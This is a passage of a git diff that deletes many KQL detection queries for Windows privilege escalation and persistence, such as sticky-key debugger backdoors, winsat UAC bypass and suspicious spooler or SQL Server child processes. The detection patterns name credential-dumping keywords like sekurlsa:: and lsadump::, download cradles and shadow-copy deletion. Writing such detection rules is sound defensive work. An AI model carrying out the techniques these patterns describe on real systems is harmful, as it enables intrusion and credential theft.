attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008 -DeviceRegistryEvents -| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger" \ No newline at end of file diff --git a/Privilege Escalation/Suspect_Svchost_Activity.kql b/Privilege Escalation/Suspect_Svchost_Activity.kql deleted file mode 100644 index 0c14e8e3..00000000 --- a/Privilege Escalation/Suspect_Svchost_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: David Burkett, @signalblur -// Date: 2019/12/28 -// Level: high -// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055 -DeviceProcessEvents -| where (ProcessCommandLine endswith "svchost.exe" and FolderPath endswith "\\svchost.exe") and (not(((InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\rpcnetp.exe") or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_Child_Process_Created_as_System.kql b/Privilege Escalation/Suspicious_Child_Process_Created_as_System.kql deleted file mode 100644 index d536982c..00000000 --- a/Privilege Escalation/Suspicious_Child_Process_Created_as_System.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR) -// Date: 2019/10/26 -// Level: high -// Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts -// Tags: attack.privilege_escalation, attack.t1134.002 -DeviceProcessEvents -| where (ProcessIntegrityLevel =~ "System" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and ((InitiatingProcessAccountName =~ "NETWORK SERVICE" and InitiatingProcessAccountDomain startswith "") or (InitiatingProcessAccountName =~ "LOCAL SERVICE" and InitiatingProcessAccountDomain startswith "")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and ((AccountName =~ "SYSTEM" and AccountDomain startswith "") or (AccountName =~ "Système" and AccountDomain startswith "") or (AccountName =~ "СИСТЕМА" and AccountDomain startswith ""))) and (not((ProcessCommandLine contains "DavSetCookie" and FolderPath endswith "\\rundll32.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_Child_Process_Of_SQL_Server.kql b/Privilege Escalation/Suspicious_Child_Process_Of_SQL_Server.kql deleted file mode 100644 index b669d6d5..00000000 --- a/Privilege Escalation/Suspicious_Child_Process_Of_SQL_Server.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: FPT.EagleEye Team, wagga -// Date: 2020/12/11 -// Level: high -// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. -// Tags: attack.t1505.003, attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\"))) \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_Child_Process_Of_Veeam_Dabatase.kql b/Privilege Escalation/Suspicious_Child_Process_Of_Veeam_Dabatase.kql deleted file mode 100644 index b9990b32..00000000 --- a/Privilege Escalation/Suspicious_Child_Process_Of_Veeam_Dabatase.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/04 -// Level: critical -// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. -// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe")) \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_Child_Process_Of_Wermgr.EXE.kql b/Privilege Escalation/Suspicious_Child_Process_Of_Wermgr.EXE.kql deleted file mode 100644 index b25dfd18..00000000 --- a/Privilege Escalation/Suspicious_Child_Process_Of_Wermgr.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/10/14 -// Level: high -// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055, attack.t1036 -DeviceProcessEvents -| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\wermgr.exe" \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_Debugger_Registration_Cmdline.kql b/Privilege Escalation/Suspicious_Debugger_Registration_Cmdline.kql deleted file mode 100644 index 8a4f2a41..00000000 --- a/Privilege Escalation/Suspicious_Debugger_Registration_Cmdline.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro -// Date: 2019/09/06 -// Level: high -// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor). -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.008 -DeviceProcessEvents -| where ProcessCommandLine contains "\\CurrentVersion\\Image File Execution Options\\" and (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "magnify.exe" or ProcessCommandLine contains "narrator.exe" or ProcessCommandLine contains "displayswitch.exe" or ProcessCommandLine contains "atbroker.exe" or ProcessCommandLine contains "HelpPane.exe") \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql b/Privilege Escalation/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql deleted file mode 100644 index df06d4d8..00000000 --- a/Privilege Escalation/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Elastic (idea), Tobias Michalski (Nextron Systems) -// Date: 2022/05/04 -// Level: high -// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service -// Tags: attack.privilege_escalation, attack.credential_access, attack.t1212 -DeviceProcessEvents -| where ((ProcessCommandLine contains "spoolss" or ProcessCommandLine contains "srvsvc" or ProcessCommandLine contains "/print/pipe/") and (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine contains "http")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_New_Service_Creation.kql b/Privilege Escalation/Suspicious_New_Service_Creation.kql deleted file mode 100644 index 2450ee8b..00000000 --- a/Privilege Escalation/Suspicious_New_Service_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/14 -// Level: high -// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName") or ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath=") and FolderPath endswith "\\sc.exe")) and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_Printer_Driver_Empty_Manufacturer.kql b/Privilege Escalation/Suspicious_Printer_Driver_Empty_Manufacturer.kql deleted file mode 100644 index 02313ce1..00000000 --- a/Privilege Escalation/Suspicious_Printer_Driver_Empty_Manufacturer.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2020/07/01 -// Level: high -// Description: Detects a suspicious printer driver installation with an empty Manufacturer value -// Tags: attack.privilege_escalation, attack.t1574, cve.2021.1675 -DeviceRegistryEvents -| where (RegistryValueData =~ "(Empty)" and (RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers" and RegistryKey contains "\\Manufacturer")) and (not((RegistryKey contains "\\CutePDF Writer v4.0" or RegistryKey contains "\\Version-3\\PDF24" or (RegistryKey contains "\\VNC Printer (PS)" or RegistryKey contains "\\VNC Printer (UD)")))) \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_Processes_Spawned_by_Java.EXE.kql b/Privilege Escalation/Suspicious_Processes_Spawned_by_Java.EXE.kql deleted file mode 100644 index 7ac4d66c..00000000 --- a/Privilege Escalation/Suspicious_Processes_Spawned_by_Java.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades), Florian Roth -// Date: 2021/12/17 -// Level: high -// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j) -// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe" \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_Processes_Spawned_by_WinRM.kql b/Privilege Escalation/Suspicious_Processes_Spawned_by_WinRM.kql deleted file mode 100644 index 156ae6e7..00000000 --- a/Privilege Escalation/Suspicious_Processes_Spawned_by_WinRM.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades), Markus Neis -// Date: 2021/05/20 -// Level: high -// Description: Detects suspicious processes including shells spawnd from WinRM host process -// Tags: attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe" \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_RunAs-Like_Flag_Combination.kql b/Privilege Escalation/Suspicious_RunAs-Like_Flag_Combination.kql deleted file mode 100644 index 20bd7e66..00000000 --- a/Privilege Escalation/Suspicious_RunAs-Like_Flag_Combination.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/11/11 -// Level: medium -// Description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools -// Tags: attack.privilege_escalation -DeviceProcessEvents -| where (ProcessCommandLine contains " -c cmd" or ProcessCommandLine contains " -c \"cmd" or ProcessCommandLine contains " -c powershell" or ProcessCommandLine contains " -c \"powershell" or ProcessCommandLine contains " --command cmd" or ProcessCommandLine contains " --command powershell" or ProcessCommandLine contains " -c whoami" or ProcessCommandLine contains " -c wscript" or ProcessCommandLine contains " -c cscript") and (ProcessCommandLine contains " -u system " or ProcessCommandLine contains " --user system " or ProcessCommandLine contains " -u NT" or ProcessCommandLine contains " -u \"NT" or ProcessCommandLine contains " -u 'NT" or ProcessCommandLine contains " --system " or ProcessCommandLine contains " -u administrator ") \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_SYSTEM_User_Process_Creation.kql b/Privilege Escalation/Suspicious_SYSTEM_User_Process_Creation.kql deleted file mode 100644 index 76673450..00000000 --- a/Privilege Escalation/Suspicious_SYSTEM_User_Process_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords) -// Date: 2021/12/20 -// Level: high -// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter) -// Tags: attack.credential_access, attack.defense_evasion, attack.privilege_escalation, attack.t1134, attack.t1003, attack.t1027 -DeviceProcessEvents -| where ((ProcessIntegrityLevel =~ "System" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\ping.exe") or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "net user "))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or ProcessCommandLine =~ "ping 127.0.0.1 -n 5" or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd")))) \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_ScreenSave_Change_by_Reg.exe.kql b/Privilege Escalation/Suspicious_ScreenSave_Change_by_Reg.exe.kql deleted file mode 100644 index d7bc0338..00000000 --- a/Privilege Escalation/Suspicious_ScreenSave_Change_by_Reg.exe.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2021/08/19 -// Level: medium -// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. -Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension - -// Tags: attack.privilege_escalation, attack.t1546.002 -DeviceProcessEvents -| where ((ProcessCommandLine contains "HKEY_CURRENT_USER\\Control Panel\\Desktop" or ProcessCommandLine contains "HKCU\\Control Panel\\Desktop") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/v ScreenSaveActive" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 1" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaveTimeout" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaverIsSecure" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 0" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v SCRNSAVE.EXE" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains ".scr" and ProcessCommandLine contains "/f")) \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_Service_Path_Modification.kql b/Privilege Escalation/Suspicious_Service_Path_Modification.kql deleted file mode 100644 index f0c3811c..00000000 --- a/Privilege Escalation/Suspicious_Service_Path_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/10/21 -// Level: high -// Description: Detects service path modification via the "sc" binary to a suspicious command or path -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") and (ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe" \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql b/Privilege Escalation/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql deleted file mode 100644 index a6b5d758..00000000 --- a/Privilege Escalation/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades) -// Date: 2021/12/22 -// Level: high -// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation) -// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe" \ No newline at end of file diff --git a/Privilege Escalation/Suspicious_Spool_Service_Child_Process.kql b/Privilege Escalation/Suspicious_Spool_Service_Child_Process.kql deleted file mode 100644 index 9e6385cb..00000000 --- a/Privilege Escalation/Suspicious_Spool_Service_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule) -// Date: 2021/07/11 -// Level: high -// Description: Detects suspicious print spool service (spoolsv.exe) child processes. -// Tags: attack.execution, attack.t1203, attack.privilege_escalation, attack.t1068 -DeviceProcessEvents -| where (ProcessIntegrityLevel =~ "System" and InitiatingProcessFolderPath endswith "\\spoolsv.exe") and ((FolderPath endswith "\\gpupdate.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\taskmgr.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\fsutil.exe" or FolderPath endswith "\\cipher.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\write.exe" or FolderPath endswith "\\wuauclt.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") or ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") and (not(ProcessCommandLine contains "start"))) or (FolderPath endswith "\\cmd.exe" and (not((ProcessCommandLine contains ".spl" or ProcessCommandLine contains "route add" or ProcessCommandLine contains "program files")))) or (FolderPath endswith "\\netsh.exe" and (not((ProcessCommandLine contains "add portopening" or ProcessCommandLine contains "rule name")))) or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (not(ProcessCommandLine contains ".spl"))) or (ProcessCommandLine endswith "rundll32.exe" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE"))) \ No newline at end of file diff --git a/Privilege Escalation/Third_Party_Software_DLL_Sideloading.kql b/Privilege Escalation/Third_Party_Software_DLL_Sideloading.kql deleted file mode 100644 index 15cbb1e6..00000000 --- a/Privilege Escalation/Third_Party_Software_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: medium -// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc) -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\")))) \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql b/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql deleted file mode 100644 index 8d57f867..00000000 --- a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where (FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" or FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winmm.dll") and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql b/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql deleted file mode 100644 index 503d8c5f..00000000 --- a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains "C:\\Windows \\system32\\winsat.exe" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql b/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql deleted file mode 100644 index 979b06ac..00000000 --- a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceRegistryEvents -| where RegistryValueData endswith "\\appdata\\local\\temp\\system32\\winsat.exe" and RegistryValueData startswith "c:\\users\\" and RegistryKey contains 